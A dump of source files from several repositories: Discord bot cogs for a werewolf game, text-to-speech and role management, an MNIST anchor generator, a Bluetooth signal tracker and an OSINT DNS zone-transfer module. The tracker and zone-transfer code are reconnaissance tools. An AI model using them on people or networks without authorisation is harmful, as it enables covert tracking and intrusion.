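The cogs above import a bare module `r` and use `r.connect()` for Redis-style set operations (`sadd`, `srem`, `smembers`, `keys`), but the module itself is not included in this dump. A minimal sketch of what it plausibly looks like, assuming a Redis backend and a `REDIS_URL` environment variable (both assumptions):

```python
# r.py -- hypothetical reconstruction of the missing helper module.
import os
import redis

def connect():
    # decode_responses=True so smembers()/keys() return str, matching how the
    # cogs compare values against str(ctx.guild.id) and str(ctx.channel.id).
    return redis.from_url(os.environ.get("REDIS_URL", "redis://localhost:6379"),
                          decode_responses=True)
```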
{ "source": "8ka1alu/jinro-gm", "score": 3 }
#### File: jinro-gm/cogs/game.py
```python
import os
import r
from discord.ext import commands
import discord
import random
import asyncio


class jgame(commands.Cog):
    def __init__(self, bot):
        self.bot = bot

    @commands.command()
    async def end(self, ctx):
        """Force-stop the game"""
        conn = r.connect()
        kk = conn.smembers("開発管理者")
        k = [l for l in kk]
        cai = str(ctx.author.id)
        if cai not in k:
            return await ctx.send("使用できません")
        d = conn.smembers("人狼参加者")
        dd = [j for j in d]
        if "0" not in dd:
            await ctx.send("強制終了します")
            ky = conn.keys()
            kys = [j for j in ky]
            for b in kys:
                if b in dd:
                    du = conn.delete(b)
            pp = conn.sadd("人狼参加者", "0")
            await ctx.send(pp)
        else:
            await ctx.send("現在使用できません")

    @commands.command()
    async def logout(self, ctx):
        """Restart the bot"""
        conn = r.connect()
        kk = conn.smembers("開発管理者")
        k = [l for l in kk]
        cai = str(ctx.author.id)
        if cai not in k:
            return await ctx.send("使用できません")
        await ctx.send('再起動します')
        await self.bot.change_presence(status=discord.Status.dnd, activity=discord.Game(name='再起動'))
        ky = conn.keys()
        js = conn.smembers("人狼参加者")
        jss = [f for f in js]
        kys = [j for j in ky]
        for b in kys:
            if b in jss:
                du = conn.delete(b)
        d = conn.delete("人狼参加者")
        await asyncio.sleep(5)
        p = conn.sadd("人狼参加者", "0")
        await self.bot.logout()

    @commands.command()
    async def start(self, ctx):
        """Start the game"""
        conn = r.connect()
        kk = conn.smembers("開発管理者")
        k = [l for l in kk]
        cai = str(ctx.author.id)
        if cai not in k:
            return await ctx.send("使用できません")
        d = conn.smembers("人狼参加者")
        dd = [j for j in d]
        if "0" not in dd:
            await ctx.send('現在使用できません')
        else:
            rp = conn.smembers("人狼役職")
            rpp = [j for j in rp]
            m = 1
            for i in rpp:
                dp = conn.get(i)
                m += int(dp)
            if len(d) != m:
                return await ctx.send("参加者もしくは役職が足りません")
            pp = conn.srem("人狼参加者", "0")
            dd.remove("0")
            await ctx.send("ゲームを開始します")
            await asyncio.sleep(0.5)
            await ctx.send("0日目\n役職がDMに配布されます")
            for ro in rpp:
                qe = conn.get(ro)
                m = 0
                while m < int(qe):
                    user = random.choice(dd)
                    up = self.bot.get_user(int(user))
                    await up.send(f"貴方は**{ro}**です")
                    p = conn.set(user, ro)
                    dd.remove(user)  # fix: was dd.remove(up); dd holds ID strings, not User objects
                    m += 1

    @commands.command()
    async def say(self, ctx, *, msg: str):  # fix: was msg:int, which made len(msg) raise TypeError
        await ctx.send(msg)
        await ctx.send(len(msg))


def setup(bot):
    bot.add_cog(jgame(bot))
```
#### File: jinro-gm/cogs/roles.py
```python
import os
import r
from discord.ext import commands
import discord
import asyncio


class jrole(commands.Cog):
    def __init__(self, bot):
        self.bot = bot

    @commands.group()
    async def role(self, ctx):
        """Role management"""
        conn = r.connect()
        # If no subcommand was given, list the current roles.
        if ctx.invoked_subcommand is None:
            jack = conn.smembers("人狼役職")
            jr = [j for j in jack]
            embed = discord.Embed(title="現在人狼役職", description=None)
            for i in jr:
                p = conn.get(i)
                embed.add_field(name=f'**{i}**', value=f'`{p}`')
            await ctx.send(embed=embed)

    @role.command()
    async def set(self, ctx, what=None, whats=None):
        conn = r.connect()
        kk = conn.smembers("開発管理者")
        k = [l for l in kk]
        cai = str(ctx.author.id)
        if cai not in k:
            return await ctx.send("使用できません")
        # fix: the None checks now come before the membership check, which
        # previously ran first and compared str(None) against the role set.
        if what is None:
            return await ctx.send("役職を指定して下さい")
        if whats is None:
            return await ctx.send("変更値を指定して下さい")
        rk = conn.smembers("人狼役職")
        kr = [l for l in rk]
        if str(what) not in kr:
            return await ctx.send("その役職はありません")
        rs = conn.set(what, whats)
        if rs == True:
            embed = discord.Embed(title="役職変更成功", description=None)
            embed.add_field(name=f'**{what}**', value=f'`{whats}`')
            await ctx.send(embed=embed)
        else:
            embed = discord.Embed(title="役職変更失敗", description="`変更に失敗しました`")
            await ctx.send(embed=embed)

    @role.command()
    async def reset(self, ctx, what=None):
        conn = r.connect()
        kk = conn.smembers("開発管理者")
        k = [l for l in kk]
        cai = str(ctx.author.id)
        if cai not in k:
            return await ctx.send("使用できません")
        if what is None:
            return await ctx.send("役職を指定して下さい")
        if what == "all":
            fl = []
            rk = conn.smembers("人狼役職")
            kr = [l for l in rk]
            for i in kr:
                pp = conn.set(i, "0")
                if pp == False:
                    fl.append(i)  # fix: was fl.apped(i), an AttributeError
            embed = discord.Embed(title="全ての役職のリセットが完了しました\n--------------------", description="以下失敗した物")
            m = 1
            for f in fl:
                embed.add_field(name=f'**No.{m}**', value=f'`{f}`')
                m += 1  # fix: the counter was never incremented
            await ctx.send(embed=embed)
        else:
            rk = conn.smembers("人狼役職")
            kr = [l for l in rk]
            if str(what) not in kr:
                return await ctx.send("その役職はありません")
            pp = conn.set(what, '0')
            if pp == True:
                embed = discord.Embed(title="役職変更成功", description=None)
                embed.add_field(name=f'**{what}**', value=f'`0`')
                await ctx.send(embed=embed)
            else:
                embed = discord.Embed(title="役職変更失敗", description="`変更に失敗しました`")
                await ctx.send(embed=embed)

    @role.group()
    async def temple(self, ctx):
        conn = r.connect()
        kk = conn.smembers("開発管理者")
        k = [l for l in kk]
        cai = str(ctx.author.id)
        if cai not in k:
            return await ctx.send("使用できません")
        if ctx.invoked_subcommand is None:
            p = conn.smembers("人狼役職")
            p = [j for j in p]
            p = '・'.join(p)
            embed = discord.Embed(title="現在設定可能役職", description=p)
            await ctx.send(embed=embed)

    @temple.command()
    async def add(self, ctx, whats=None):
        conn = r.connect()
        kk = conn.smembers("開発管理者")
        k = [l for l in kk]
        cai = str(ctx.author.id)
        if cai not in k:
            return await ctx.send("使用できません")
        if whats is None:
            return await ctx.send("役職を指定して下さい")
        p = conn.sadd("人狼役職", whats)
        if p == True:
            embed = discord.Embed(title="役職導入成功", description=f"`{whats}`")
            await ctx.send(embed=embed)
        else:
            embed = discord.Embed(title="役職導入失敗", description="`変更に失敗しました`")
            await ctx.send(embed=embed)

    @temple.command()
    async def delete(self, ctx, what=None):
        conn = r.connect()
        kk = conn.smembers("開発管理者")
        k = [l for l in kk]
        cai = str(ctx.author.id)
        if cai not in k:
            return await ctx.send("使用できません")
        if what is None:
            return await ctx.send("役職を指定して下さい")
        p = conn.srem("人狼役職", what)
        if p == True:
            embed = discord.Embed(title="役職削除成功", description=f"`{what}`")
            await ctx.send(embed=embed)
        else:
            embed = discord.Embed(title="役職削除失敗", description="`変更に失敗しました`")
            await ctx.send(embed=embed)


def setup(bot):
    bot.add_cog(jrole(bot))
```
{ "source": "8ka1alu/text-to-voice", "score": 3 }
#### File: text-to-voice/cogs/vc.py ```python import discord from discord.ext import commands import os import r from gtts import gTTS import discordbot as dib prefix = dib.prefix conn = r.connect() ffmpegopts = { 'before_options': '-nostdin', 'options': '-vn' } class VC(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command(aliases=["connect","summon","con"]) async def join(self, ctx): """ボイスチャンネルに接続""" voice_state = ctx.author.voice if (not voice_state) or (not voice_state.channel): await ctx.send("先にボイスチャンネルに入っている必要があります。") return vch = conn.exists('voice_ch') if vch == 1: ch_id = conn.get('voice_ch') await ctx.send(f"現在別チャンネルにて使用中です(id:{ch_id})") return channel = voice_state.channel await channel.connect() conn.set('voice_ch',ctx.channel.id) embed = discord.Embed(title="**接続完了**", description=f"接続チャンネル名```{channel.name}```") embed.timestamp = ctx.message.created_at await ctx.send(embed = embed) @commands.command(aliases=["disconnect","bye","dis"]) async def leave(self, ctx): """ボイスチャンネルから退室""" voice_client = ctx.message.guild.voice_client if not voice_client: await ctx.send("Botはこのサーバーのボイスチャンネルに参加していません。") return await voice_client.disconnect() conn.delete('voice_ch') embed = discord.Embed(title="**ボイスチャンネルから切断しました**", description=None) embed.timestamp = ctx.message.created_at await ctx.send(embed = embed) @commands.Cog.listener() async def on_message(self, message): """メッセージの変換""" if message.author.bot: return if message.content.startswith(prefix): return vch = conn.exists('voice_ch') if vch == 0: return ch_id = conn.get('voice_ch') if str(message.channel.id) == ch_id: voice_client = message.guild.voice_client myText = message.content language ='ja' output = gTTS(text=myText, lang=language, slow=False) output.save("voice.mp3") ffmpeg_audio_source = discord.FFmpegPCMAudio("voice.mp3", **ffmpegopts) voice_client.play(ffmpeg_audio_source) return @commands.Cog.listener() async def on_guild_join(self, guild): """bot導入時挨拶""" ch=guild.system_channel em = discord.Embed(title="**導入ありがとうございます**",description=f"HELPは```{prefix}help```で表示できます", color=discord.Color.blue()) if ch != None: await ch.send(embed=em) def setup(bot): bot.add_cog(VC(bot)) ```
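The text-to-speech step inside `on_message` above can be verified in isolation with gTTS; the sample text is arbitrary.

```python
# Standalone check of the gTTS -> mp3 path used by the cog above.
from gtts import gTTS

gTTS(text="テストです", lang="ja", slow=False).save("voice.mp3")
```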
{ "source": "8ka1alu/vs-cog", "score": 2 }
#### File: vs-cog/cogs/roles.py ```python from discord.ext import commands # Bot Commands Frameworkのインポート import discord import asyncio import random import datetime great_owner_id = 459936557432963103 # コグとして用いるクラスを定義。 class roles(commands.Cog): # rolesクラスのコンストラクタ。Botを受取り、インスタンス変数として保持。 def __init__(self, bot): self.bot = bot # メインとなるroleコマンド @commands.group(aliases=['rl']) @commands.has_permissions(manage_guild=True) async def role(self, ctx): """役職関連(管理者用)""" # サブコマンドが指定されていない場合、メッセージを送信する。 if ctx.invoked_subcommand is None: await ctx.send('このコマンドにはサブコマンドが必要です。') # roleコマンドのサブコマンド # 指定したユーザーに指定した役職を付与する。 @role.command(aliases=['ad']) async def add(self, ctx, member: discord.Member, role: discord.Role): """付与(管理者用)""" await member.add_roles(role) await ctx.send('付与しました。') # roleコマンドのサブコマンド # 指定したユーザーから指定した役職を剥奪する。 @role.command(aliases=['rm']) async def remove(self, ctx, member: discord.Member, role: discord.Role): """剥奪(管理者用)""" await member.remove_roles(role) await ctx.send('剥奪しました。') # roleコマンドのサブコマンド # 指定した役職を削除する。 @role.command(aliases=['dl']) async def delete(self, ctx, role: discord.Role=None): """削除(管理者用)""" if role == None: await ctx.send('役職名を指定して下さい。') return #role = discord.utils.get(ctx.guild.roles, name=role_name) await role.delete() await ctx.send('削除しました。') # roleコマンドのサブコマンド # 役職を作成する。 @role.command(aliases=['cr']) async def create(self, ctx, what= None): """作成(管理者用)""" if what == None: what = "new role" rote = 0 #システム hoist = False mentionable = False #基本権限 administrator = False view_audit_log = False manage_guild = False manage_roles = False manage_channels = False kick_members = False ban_members = False create_instant_invite = False change_nicknames = False manage_nicknames = False manage_emojis = False manage_webhooks = False read_messages = False #テキスト権限 send_messages = False send_tts_messages = False manage_messages = False embed_links = False attach_files = False read_message_history = False mention_everyone = False external_emojis = False add_reactions = False #ボイス権限 connect = False speak = False mute_members = False deafen_members = False move_members = False use_voice_activation = False while rote < 2: if rote == 1: await msg.delete() if read_messages == True: await msgf.delete() await msgs.delete() rote=0 await asyncio.sleep(0.4) roleedit = discord.Embed(title="権限設定",description=f"番号・記号を入力して下さい。") roleedit.add_field(name=f"**オンラインメンバーとは別にロールメンバーを表示する({hoist})**",value='`a`') roleedit.add_field(name=f"**このロールに対して@mentionを許可する({mentionable})**",value='`b`') roleedit.add_field(name=f"**管理者({administrator})**",value='`1`') roleedit.add_field(name=f"**監査ログを表示({view_audit_log})**",value='`2`') roleedit.add_field(name=f"**サーバーの管理({manage_guild})**",value='`3`') roleedit.add_field(name=f"**ロールの管理({manage_roles})**",value='`4`') roleedit.add_field(name=f"**チャンネルの管理({manage_channels})**",value='`5`') roleedit.add_field(name=f"**メンバーをKICK({kick_members})**",value='`6`') roleedit.add_field(name=f"**メンバーをBAN({ban_members})**",value='`7`') roleedit.add_field(name=f"**招待を作成({create_instant_invite})**",value='`8`') roleedit.add_field(name=f"**ニックネームの変更({change_nicknames})**",value='`9`') roleedit.add_field(name=f"**ニックネームの管理({manage_nicknames})**",value='`10`') roleedit.add_field(name=f"**絵文字の管理({manage_emojis})**",value='`11`') roleedit.add_field(name=f"**ウェブフックの管理({manage_webhooks})**",value='`12`') roleedit.add_field(name=f"**テキストチャンネルの閲覧&ボイスチャンネルの表示({read_messages})**",value='`13`') roleedit.add_field(name="----------",value='----------') 
roleedit.add_field(name="**無付与・設定完了**",value='`0`') msg = await ctx.send(embed=roleedit) if read_messages == True: await asyncio.sleep(0.1) roletxt = discord.Embed(title="テキストの権限",description=f"番号を入力して下さい。") roletxt.add_field(name=f"**メッセージを送信({send_messages})**",value='`14`') roletxt.add_field(name=f"**TTSメッセージを送信({send_tts_messages})**",value='`15`') roletxt.add_field(name=f"**メッセージの管理({manage_messages})**",value='`16`') roletxt.add_field(name=f"**埋め込みリンク({embed_links})**",value='`17`') roletxt.add_field(name=f"**ファイルの添付({attach_files})**",value='`18`') roletxt.add_field(name=f"**メッセージ履歴を読む({read_message_history})**",value='`19`') roletxt.add_field(name=f"**@everyone,@here,すべてのロールにメンション({mention_everyone})**",value='`20`') roletxt.add_field(name=f"**外部の絵文字の使用({external_emojis})**",value='`21`') roletxt.add_field(name=f"**リアクションの追加({add_reactions})**",value='`22`') roletxt.add_field(name="----------",value='----------') roletxt.add_field(name="**無付与・設定完了**",value='`0`') msgs = await ctx.channel.send(embed=roletxt) await asyncio.sleep(0.1) rolevoc = discord.Embed(title="音声の権限",description=f"番号を入力して下さい。") rolevoc.add_field(name=f"**接続({connect})**",value='`23`') rolevoc.add_field(name=f"**発言({speak})**",value='`24`') rolevoc.add_field(name=f"**メンバーをミュート({mute_members})**",value='`25`') rolevoc.add_field(name=f"**メンバーのスピーカーをミュート({deafen_members})**",value='`26`') rolevoc.add_field(name=f"**メンバーを移動({move_members})**",value='`27`') rolevoc.add_field(name=f"**音声検出を使用({use_voice_activation})**",value='`28`') rolevoc.add_field(name="----------",value='----------') rolevoc.add_field(name="**無付与・設定完了**",value='`0`') msgf = await ctx.send(embed=rolevoc) def rotetime(m): return m.content == "a" or "b" or "0" or "1" or "2" or "3" or "4" or "5" or "6" or "7" or "8" or "9" or "10" or "11" or "12" or "13" or "14" or "15" or "16" or "17" or "18" "19" or "20" or "21" or "22" or "23" or "24" or "25" or "26" or "27" or "28" and m.author == ctx.author try: reply = await self.bot.wait_for( "message" , check = rotetime , timeout = 300.0 ) except asyncio.TimeoutError: await ctx.channel.send( "設定を中止します。(type:time over)" ) return else: if reply.content == "0": await msg.delete() if read_messages == True: await msgf.delete() await msgs.delete() rote = 2 elif reply.content == "a": if hoist == False: hoist = True elif hoist == True: hoist = False rote = 1 elif reply.content == "b": if mentionable == False: mentionable = True elif mentionable == True: mentionable = False rote = 1 elif reply.content == "1": if administrator == False: administrator = True elif administrator == True: administrator = False rote = 1 elif reply.content == "2": if view_audit_log == False: view_audit_log = True elif view_audit_log == True: view_audit_log = False rote = 1 elif reply.content == "3": if manage_guild == False: manage_guild = True elif manage_guild == True: manage_guild = False rote = 1 elif reply.content == "4": if manage_roles == False: manage_roles = True elif manage_roles == True: manage_roles = False rote = 1 elif reply.content == "5": if manage_channels == False: manage_channels = True elif manage_channels == True: manage_channels = False rote = 1 elif reply.content == "6": if kick_members == False: kick_members = True elif kick_members == True: kick_members = False rote = 1 elif reply.content == "7": if ban_members == False: ban_members = True elif ban_members == True: ban_members = False rote = 1 elif reply.content == "8": if create_instant_invite == False: create_instant_invite = True elif create_instant_invite == True: 
create_instant_invite = False rote = 1 elif reply.content == "9": if change_nicknames == False: change_nicknames = True elif change_nicknames == True: change_nicknames = False rote = 1 elif reply.content == "10": if manage_nicknames == False: manage_nicknames = True elif manage_nicknames == True: manage_nicknames = False rote = 1 elif reply.content == "11": if manage_emojis == False: manage_emojis = True elif manage_emojis == True: manage_emojis = False rote = 1 elif reply.content == "12": if manage_webhooks == False: manage_webhooks = True elif manage_webhooks == True: manage_webhooks = False rote = 1 elif reply.content == "13": if read_messages == False: read_messages = True msgf = await ctx.send("○") msgs = await ctx.send("○") elif read_messages == True: read_messages = False send_messages = False send_tts_messages = False manage_messages = False embed_links = False attach_files = False read_message_history = False mention_everyone = False external_emojis = False add_reactions = False connect = False speak = False mute_members = False deafen_members = False move_members = False use_voice_activation = False await msgf.delete() await msgs.delete() rote = 1 elif reply.content == "14": if send_messages == False: send_messages = True elif send_messages == True: send_messages = False rote = 1 elif reply.content == "15": if send_tts_messages == False: send_tts_messages = True elif send_tts_messages == True: send_tts_messages = False rote = 1 elif reply.content == "16": if manage_messages == False: manage_messages = True elif manage_messages == True: manage_messages = False rote = 1 elif reply.content == "17": if embed_links == False: embed_links = True elif embed_links == True: embed_links = False rote = 1 elif reply.content == "18": if attach_files == False: attach_files = True elif attach_files == True: attach_files = False rote = 1 elif reply.content == "19": if read_message_history == False: read_message_history = True elif read_message_history == True: read_message_history = False rote = 1 elif reply.content == "20": if mention_everyone == False: mention_everyone = True elif mention_everyone == True: mention_everyone = False rote = 1 elif reply.content == "21": if external_emojis == False: external_emojis = True elif external_emojis == True: external_emojis = False rote = 1 elif reply.content == "22": if add_reactions == False: add_reactions = True elif add_reactions == True: add_reactions = False rote = 1 elif reply.content == "23": if connect == False: connect = True elif connect == True: connect = False rote = 1 elif reply.content == "24": if speak == False: speak = True elif speak == True: speak = False rote = 1 elif reply.content == "25": if mute_members == False: mute_members = True elif mute_members == True: mute_members = False rote = 1 elif reply.content == "26": if deafen_members == False: deafen_members = True elif deafen_members == True: deafen_members = False rote = 1 elif reply.content == "27": if move_members == False: move_members = True elif move_members == True: move_members = False rote = 1 elif reply.content == "28": if use_voice_activation == False: use_voice_activation = True elif use_voice_activation == True: use_voice_activation = False rote = 1 else: await asyncio.sleep(303.0) await reply.delete() pre = 
discord.Permissions(administrator=administrator,view_audit_log=view_audit_log,manage_guild=manage_guild,manage_roles=manage_roles,manage_channels=manage_channels,kick_members=kick_members,ban_members=ban_members,create_instant_invite=create_instant_invite,change_nickname=change_nicknames,manage_nicknames=manage_nicknames,manage_emojis=manage_emojis,manage_webhooks=manage_webhooks,read_messages=read_messages,send_messages=send_messages, send_tts_messages=send_tts_messages,manage_messages=manage_messages,embed_links=embed_links,attach_files=attach_files,read_message_history=read_message_history,mention_everyone=mention_everyone,external_emojis=external_emojis,add_reactions=add_reactions, connect=connect,speak=speak,mute_members=mute_members,deafen_members=deafen_members,move_members=move_members,use_voice_activation=use_voice_activation) guild = ctx.guild set_name2 = f"{what}" await guild.create_role(name=set_name2,hoist=hoist,mentionable=mentionable,permissions=pre) await ctx.send(f'作成しました。@' + set_name2) # Bot本体側からコグを読み込む際に呼び出される関数。 def setup(bot): bot.add_cog(roles(bot)) # mainにBotを渡してインスタンス化し、Botにコグとして登録する。 ``` #### File: vs-cog/cogs/scythe_member.py ```python import os import r from discord.ext import commands import discord import random class scythe(commands.Cog): def __init__(self, bot): self.bot = bot self.namebea = 0 self.givepoint = 0 @commands.command(name="コンパス") async def compass_character(self, ctx, op=None): """(アタッカー,ガンナー,タンク,スプリンター)からランダムに出力""" if op == None: cc=random.choice(("アタッカー","ガンナー","タンク","スプリンター")) else: cc=op conn=r.connect() pp=conn.smembers(cc) pp=[cv for cv in pp] gg=random.choice(pp) embed = discord.Embed(title="**ランダムキャラ**",description=f"{ctx.author.mention}さんの使うキャラは") embed.add_field(name=f"**タイプ**",value=f"`{cc}`") embed.add_field(name=f"**キャラ名**",value=f"`{gg}`") await ctx.send(embed=embed) @commands.command(name="登録") async def sighin(self, ctx): """ポイント制度登録""" self.namebea = 0 conn = r.connect() k = conn.keys() cai = str(ctx.author.id) for i in k: if i == cai: self.namebea += 1 if self.namebea == 0: nb = conn.set(cai,"150") nb2 = conn.sadd("scythes",cai) if nb == True: await ctx.send("登録しました。\n登録特典で100Point付与しました。") else: await ctx.send("登録に失敗しました。\nやり直して下さい。") else: await ctx.send("既に登録済みです。") @commands.command(name="ポイント確認") async def get_point(self, ctx, user_id:int= None): """ポイントの確認""" conn=r.connect() ci = str(ctx.author.id) gu = self.bot.get_user(user_id) ui = str(user_id) if user_id == None: embed = discord.Embed(title=f"**{ctx.author.name}さんの情報**", description=None) up = conn.get(ci) embed.add_field(name="現在ポイント", value=f"`{up}p`") await ctx.send(embed=embed) return else: embed = discord.Embed(title=f"**{gu.name}さんの情報**", description=None) up = conn.get(ui) embed.add_field(name="現在ポイント", value=f"`{up}p`") await ctx.send(embed=embed) return @commands.command(name="P制御") async def give_point(self, ctx, user_id:int=None, point:int=None): """ポイント付与・剥奪""" if user_id == None: return await ctx.send("ユーザーIDを設定して下さい。") if point == None: return await ctx.send("付与ポイントを設定して下さい。") self.givepoint = 0 c = str(ctx.author.id) conn = r.connect() sm = conn.smembers('adomin') for ad in sm: if ad == c: self.givepoint += 1 if self.givepoint == 0: return await ctx.send("貴方は操作できません。") un = self.bot.get_user(user_id) ui = str(user_id) up = conn.get(ui) up = int(up) + point us = conn.set(ui,up) if us == True: return await ctx.send(f"{un.name}さんに`{point}`P付与しました。") else: return await ctx.send("付与に失敗しました。\n最初からやり直して下さい。") @commands.command(name="ID取得") async def 
getid(self, ctx, user_mention:discord.Member=None): """ID確認用""" if user_mention == None: await ctx.send(f"{ctx.author.name}さんのidは") return await ctx.send(ctx.author.id) await ctx.send(f"{user_mention.name}さんのidは") await ctx.send(user_mention.id) @commands.command(name="ポイント管理者") async def point_admin(self, ctx): """ポイント管理者一覧""" P=1 conn = r.connect() sm = conn.smembers('adomin') embed = discord.Embed(title=f"**ポイント管理者一覧**", description=None, color=0x9b59b6) for ad in sm: adm = self.bot.get_user(int(ad)) embed.add_field(name=f"{P}人目", value=f"`{adm}`") P+=1 await ctx.send(embed=embed) @commands.command(name="P集会付与") async def all_give_point(self, ctx): """集会参加ポイント""" self.givepoint = 0 c = str(ctx.author.id) conn = r.connect() sm = conn.smembers('adomin') for ad in sm: if ad == c: self.givepoint += 1 if self.givepoint == 0: return await ctx.send("貴方は操作できません。") mem=conn.smembers("scythes") for p in mem: q=ctx.guild.get_member(int(p)) for ro in q.roles: if ro.name == "集会参加": cg=conn.get(p) bp=int(cg)+150 det=conn.set(p,bp) for am in ctx.guild.members: for adf in am.roles: prole = ctx.guild.get_role(709678662961594371) if adf.name == "集会参加": await am.remove_roles(prole) await ctx.send("付与完了しました。") @commands.command(name="登録者") async def point_geter(self, ctx): """ポイント登録者一覧""" P=1 conn = r.connect() sm = conn.smembers('scythes') embed = discord.Embed(title=f"**登録者**", description=None) for ad in sm: adm = self.bot.get_user(int(ad)) embed.add_field(name=f"{P}人目", value=f"`{adm}`") P+=1 await ctx.send(embed=embed) def setup(bot): bot.add_cog(scythe(bot)) ``` #### File: vs-cog/cogs/test.py ```python from discord.ext import commands # Bot Commands Frameworkのインポート import discord import asyncio great_owner_id = 459936557432963103 # コグとして用いるクラスを定義。 class test(commands.Cog): # testクラスのコンストラクタ。Botを受取り、インスタンス変数として保持。 def __init__(self, bot): self.bot = bot @commands.command() async def say(self, ctx, what): """オウム返し""" if ctx.author.id != <PASSWORD>: return await ctx.send(what) # Bot本体側からコグを読み込む際に呼び出される関数。 def setup(bot): bot.add_cog(test(bot)) # mainにBotを渡してインスタンス化し、Botにコグとして登録する。 ```
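The interactive `create` command above toggles roughly thirty booleans and feeds them all into `discord.Permissions`. For reference, the same object can be built directly with keyword flags; this sketch is illustrative and not part of the repo.

```python
# Building a Permissions bitfield directly (flag names are discord.py's own).
import discord

perms = discord.Permissions(read_messages=True, send_messages=True,
                            connect=True, speak=True)
print(perms.value)  # the integer bitfield Discord stores for a role
```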
{ "source": "8kta/ShuffleMNIST", "score": 3 }
#### File: 8kta/ShuffleMNIST/RandomAnchors.py
```python
import torch
from Sphere import Sphere


class RandomAnchors():
    '''
    RandomAnchors generates random, non-overlapping anchor points (centers)
    for images to be pasted onto a tensor wall. This version only yields
    anchor coordinates with entries below 84; it could be generalized later.

    Parameters
    ---------------
    num : number of images you want in the wall.
    radius : radius of the sphere used for the overlap check.

    Returns
    ---------------
    anchors : tensor type
        These tensors are the anchors at which the images will be pasted.
    '''
    def __init__(self, num=1, radius=42):
        self.num = num
        self.radius = radius
        self.anchors = []
        self.sph_centers = []
        if num < 1 or type(num) != int:
            raise ValueError('Number of images must be an integer greater than or equal to 1.')

    def random_img(self):
        while len(self.anchors) < self.num:
            rand = torch.randint(84, size=(1, 2)).reshape(-1)
            sph_rand = Sphere(rand, self.radius)
            center = sph_rand.center()
            sph_center = Sphere(center, self.radius)
            if len(self.anchors) == 0:
                self.anchors.append(rand)
                self.sph_centers.append(sph_center)
            # Accept the candidate only if its center lies outside every sphere
            # accepted so far. (The loop variable was renamed from sph_center,
            # which shadowed the candidate's own sphere.)
            elif not any(existing.isinterior(center) for existing in self.sph_centers):
                self.anchors.append(rand)
                self.sph_centers.append(sph_center)
        return self.anchors


if __name__ == '__main__':
    num = 4
    an = RandomAnchors(num)
    random = an.random_img()
    print('{} random anchors are {}'.format(num, random))
```
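A sketch of consuming the anchors. It assumes `RandomAnchors` (and its `Sphere` dependency) are importable and that the pasted images are 28x28 MNIST digits; both are assumptions, since the paste step itself is not part of this file.

```python
# Pasting stand-in digits at the sampled anchors; anchors lie in [0, 84).
import torch
from RandomAnchors import RandomAnchors

wall = torch.zeros(84 + 28, 84 + 28)  # pad right/bottom so a 28x28 paste always fits
digit = torch.rand(28, 28)            # stand-in for an MNIST digit
for anchor in RandomAnchors(num=3).random_img():
    y, x = int(anchor[0]), int(anchor[1])
    wall[y:y + 28, x:x + 28] = digit
```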
{ "source": "8L4NK/bluemaho2", "score": 2 }
#### File: bluemaho2/tools/bluetracker.py ```python import sys, time, subprocess def bttrack(adr, dev, delay): error_count = 0 cmd_cc = "hcitool -i %s cc %s" % ( dev, adr ) cmd_lq = "hcitool -i %s lq %s" % ( dev, adr ) cmd_rssi = "hcitool -i %s rssi %s" % ( dev, adr ) while 1: out = subprocess.Popen(cmd_cc.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate() time.sleep(1) if len(out[1]): print "can\'t create connection" time.sleep(1) error_count += 1 if error_count == 5: print "exiting.." return 1 else: while 1: out = subprocess.Popen(cmd_lq.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate() if len(out[1]): break else: print '%s link quality: %s,' % ( adr, out[0].split()[2]), out = subprocess.Popen(cmd_rssi.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate() if len(out[1]): break else: print 'rssi: %s' % (out[0].split()[3]) time.sleep(delay) if len(sys.argv) != 4: print "\n\t bluetracker.py <hciN> <bdaddr> <delay in s, default=0.2>\n" else: # get original local name and mode orig_auth = False cmd = "hciconfig -a %s" % (sys.argv[1]) cmd_out = subprocess.Popen(cmd.split(),stdout=subprocess.PIPE).communicate() if cmd_out[0]: a = cmd_out[0].split('\n\t') for b in a: if "AUTH" in b: orig_auth = True cmd = "hciconfig -a %s noauth" % (hci_dev) subprocess.Popen(cmd.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate() bttrack(sys.argv[2], sys.argv[1], float(sys.argv[3])) if orig_auth == True: cmd = "hciconfig -a %s auth" % (hci_dev) subprocess.Popen(cmd.split(),stdout=subprocess.PIPE,stderr=subprocess.PIPE).communicate() ```
{ "source": "8L4NK/FullAutoOSINT", "score": 2 }
#### File: modules/action/osint_dns_zonetransfer.py ```python from core.osintModule import osintModule from core.keystore import KeyStore as kb from core.utils import Utils from core.mydns import MyDNS import re class osint_dns_zonetransfer(osintModule): def __init__(self, config, display, lock): super(osint_dns_zonetransfer, self).__init__(config, display, lock) self.title = "DNS Zone Transfer" self.shortName = "DNSXfer" self.description = "Checking for DNS zone transfers on DNS domains" self.requirements = [] self.triggers = ["newDNSDomain"] self.types = ["OSINT", "DNS"] def getTargets(self): self.targets = kb.get('osint/dnsdomain/') def fixStr(self, text): if isinstance(text, str): text = text.lower() elif isinstance(text, unicode): text = text.encode('utf-8') text = text.lower() return text def processZoneLine(self, text, domain): lines = text.splitlines() for line in lines: line = self.fixStr(line) result = re.match("(\S+?)\s+?(\d+?)\s+?(in)\s+?(\S+?)\s+(.*)", line.strip()) if result: host = self.fixStr(result.group(1)) ttl = self.fixStr(result.group(2)) record_class = self.fixStr(result.group(3)) record_type = self.fixStr(result.group(4)) record_data = self.fixStr(result.group(5)) if host == "@": host = domain if record_type == "a": host = host[:host.find(domain) + len(domain)] kb.add('osint/dnsdomain/' + domain + '/A/' + host + "/" + record_data) self.fire("newDNSARecord") elif record_type == "ns": temp = record_data[:-1] temp = temp[:host.find(domain) + len(domain)] kb.add('osint/dnsdomain/' + domain + '/NS/' + temp) self.fire("newDNSNSRecord") #elif record_type == "txt": # print line #elif record_type == "mx": # print line elif record_type == "cname": host = host[:host.find(domain) + len(domain)] kb.add('osint/dnsdomain/' + domain + '/CNAME/' + host + "/" + record_data[:-1]) self.fire("newDNSCNAMERecord") elif record_type == "ptr": if "in-addr.arpa" in host: record_data = record_data[:host.find(domain) + len(domain)] kb.add('osint/dnsdomain/' + domain + '/PTR/' + host + "/" + record_data) self.fire("newDNSPTRRecord") host = host.replace("in-addr.arpa", "") parts = host.split('.') host = parts[3] + "." + parts[2] + "." + parts[1] + "." 
